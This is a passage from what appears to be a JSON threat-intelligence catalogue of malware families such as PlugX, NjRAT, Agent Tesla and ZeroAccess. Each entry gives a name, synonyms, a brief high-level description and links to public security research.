- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8",
- "value": "BlackRevolution",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/"
- ]
- }
- },
- {
- "uuid": "64b34624-37de-4c51-8856-e721e31e67db",
- "value": "Mokes",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
- "https://objective-see.com/blog/blog_0x16.html"
- ]
- }
- },
- {
- "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8",
- "value": "tDiscoverer",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
- ]
- }
- },
- {
- "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
- "value": "Project Alice", 
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
- ]
- }
- },
- {
- "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9",
- "value": "AlphaNC",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
- ]
- }
- },
- {
- "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063",
- "value": "Grateful POS",
- "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html",
- "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season"
- ]
- }
- },
- {
- "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
- "value": "Konni",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
- "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
- "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html"
- ]
- }
- },
- {
- "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
- "value": "Rootnik",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
- "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
- ]
- }
- },
- {
- "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
- "value": "Unidentified APK 002",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
- "value": "Agent Tesla",
- "description": "A .NET based keylogger and RAT readily available to actors. 
Logs keystrokes and the host's clipboard and beacons this information back to the C2.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
- "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
- "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
- "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
- "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
- "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting"
- ]
- }
- },
- {
- "uuid": "541b64bc-87ec-4cc2-aaee-329355987853",
- "value": "FinFisher RAT",
- "description": "",
- "meta": {
- "synonyms": [
- "FinSpy"
- ],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
- "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
- "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
- "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
- "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
- ]
- }
- },
- {
- "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625",
- "value": "Heloag",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/",
- "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/"
- ]
- }
- },
- 
{
- "uuid": "d91c4184-608e-47b1-b746-0e98587e2455",
- "value": "Ploutus ATM",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
- "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html"
- ]
- }
- },
- {
- "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f",
- "value": "Cryakl",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
- "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
- "https://hackmag.com/security/ransomware-russian-style/",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx"
- ]
- }
- },
- {
- "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed",
- "value": "DMA Locker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/",
- "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/"
- ]
- }
- },
- {
- "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685",
- "value": "Computrace",
- "description": "",
- "meta": {
- "synonyms": [
- "lojack"
- ],
- "type": [],
- "refs": [
- "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
- "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
- "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
- "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research"
- ]
- }
- },
- {
- "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c",
- "value": "KasperAgent",
- "description": "",
- "meta": {
- 
"synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
- "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
- ]
- }
- },
- {
- "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc",
- "value": "Chir",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba",
- "value": "FindPOS",
- "description": "",
- "meta": {
- "synonyms": [
- "Poseidon"
- ],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
- "https://blogs.cisco.com/security/talos/poseidon"
- ]
- }
- },
- {
- "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
- "value": "WebC2-Yahoo",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
- "value": "CukieGrab",
- "description": "",
- "meta": {
- "synonyms": [
- "Roblox Trade Assist"
- ],
- "type": [],
- "refs": [
- "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/"
- ]
- }
- },
- {
- "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf",
- "value": "Stampedo",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/"
- ]
- }
- },
- {
- "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
- "value": "Bredolab",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/",
- "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html"
- ]
- }
- },
- {
- "uuid": 
"d1298818-6425-49be-9764-9f119d964efd",
- "value": "GoogleDrive RAT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
- ]
- }
- },
- {
- "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f",
- "value": "ReactorBot",
- "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
- "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html"
- ]
- }
- },
- {
- "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8",
- "value": "HTran",
- "description": "",
- "meta": {
- "synonyms": [
- "HUC Packet Transmit Tool"
- ],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
- "https://www.secureworks.com/research/htran"
- ]
- }
- },
- {
- "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
- "value": "NjRAT",
- "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. 
Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.",
- "meta": {
- "synonyms": [
- "Bladabindi"
- ],
- "type": [],
- "refs": [
- "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
- "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services"
- ]
- }
- },
- {
- "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
- "value": "Tidepool",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf",
- "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
- ]
- }
- },
- {
- "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
- "value": "ZeroAccess",
- "description": "",
- "meta": {
- "synonyms": [
- "Max++",
- "Smiscer"
- ],
- "type": [],
- "refs": [
- "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
- "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
- "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
- "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
- 
"http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
- "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/"
- ]
- }
- },
- {
- "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae",
- "value": "Micropsia",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
- "http://blog.talosintelligence.com/2017/06/palestine-delphi.html"
- ]
- }
- },
- {
- "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee",
- "value": "PlugX",
- "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.",
- "meta": {
- "synonyms": [
- "Korplug"
- ],
- "type": [],
- "refs": [
- "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
- "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
- "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://community.rsa.com/thread/185439",
- 
"https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
- "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
- "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
- "https://securelist.com/time-of-death-connected-medicine/84315/",
- "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
- "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
- "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf"
- ]
- }
- },
- {
- "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493",
- "value": "ChewBacca",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/"
- ]
- }
- },
- {
- "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de",
- "value": "Contopee",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
- ]
- }
- },
- {
- "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00",
- "value": "Asprox",
- "description": "",
- "meta": {
- "synonyms": [
- "Aseljo",
- "BadSrc"
- ],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/",
- "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/"
- ]
- }
- },
- {
- "uuid": "8269e779-db23-4c94-aafb-36ee94879417",
- "value": "DualToy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
- ]
- }
- },
- {
- "uuid": 
"ec50a75e-81f0-48b3-b1df-215eac646421",
- "value": "NewCT",
- "description": "",
- "meta": {
- "synonyms": [
- "CT"
- ],
- "type": [],
- "refs": [
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
- ]
- }
- },
- {
- "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
- "value": "CrossRAT",
- "description": "",
- "meta": {
- "synonyms": [
- "Trupto"
- ],
- "type": [],
- "refs": [
- "https://objective-see.com/blog/blog_0x28.html",
- "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
- ]
- }
- },
- {
- "uuid": "3760920e-4d1a-40d8-9e60-508079499076",
- "value": "Neutrino",
- "description": "",
- "meta": {
- "synonyms": [
- "Kasidet"
- ],
- "type": [],
- "refs": [
- "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
- "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
- "http://securitykitten.github.io/an-evening-with-n3utrino/",
- "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
- "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
- "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
- "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
- ]
- }
- },
- {
- "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2",
- "value": "CryptoRansomeware",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/JaromirHorejsi/status/818369717371027456"
- ]
- }
- },
- {
- "uuid": 
"cfdb02f2-a767-4abb-b04c-333a02cdd7e2",
- "value": "DROPSHOT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/",
- "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/"
- ]
- }
- },
- {
- "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1",
- "value": "BYEBY",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
- ]
- }
- },
- {
- "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
- "value": "PrincessLocker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/",
- "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/",
- "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/"
- ]
- }
- },
- {
- "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
- "value": "MAPIget",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184",
- "value": "AnubisSpy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
- ]
- }
- },
- {
- "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6",
- "value": "Unidentified 006",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": 
"d9255166-79b3-49af-b676-c07fa9303d7e", - "value": "Winnti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://401trg.pw/winnti-evolution-going-open-source/", - " https://401trg.pw/an-update-on-winnti/" - ] - } - }, - { - "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", - "value": "JackPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" - ] - } - }, - { - "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", - "value": "OmniRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", - "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" - ] - } - }, - { - "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", - "value": "Filecoder", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/877811773826641920" - ] - } - }, - { - "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] - } - }, - { - "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", - "value": "ShellBind", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" - ] - } - }, - { - "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", - "value": "Rakos", - "description": "", - 
"meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - ] - } - }, - { - "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", - "value": "ISMAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/ismagent/" - ] - } - }, - { - "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan" - ] - } - }, - { - "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] - } - }, - { - "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "", - "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - 
"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" - ] - } - }, - { - "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", - "value": "Turla RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", - "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" - ] - } - }, - { - "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.intezer.com/silenceofthemoles/", - "https://securelist.com/the-silence/83009/" - ] - } - }, - { - "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", - "value": "w32times", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://attack.mitre.org/wiki/Group/G0022" - ] - } - }, - { - "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", - "value": "Kurton", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", - "value": "MiniASP", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - 
"uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", - "value": "Zeus SSL", - "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Marten4n6/EvilOSX", - "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] - } - }, - { - "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", - "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] - } - }, - { - "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "", - "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", - "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] - } - }, - { - "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - 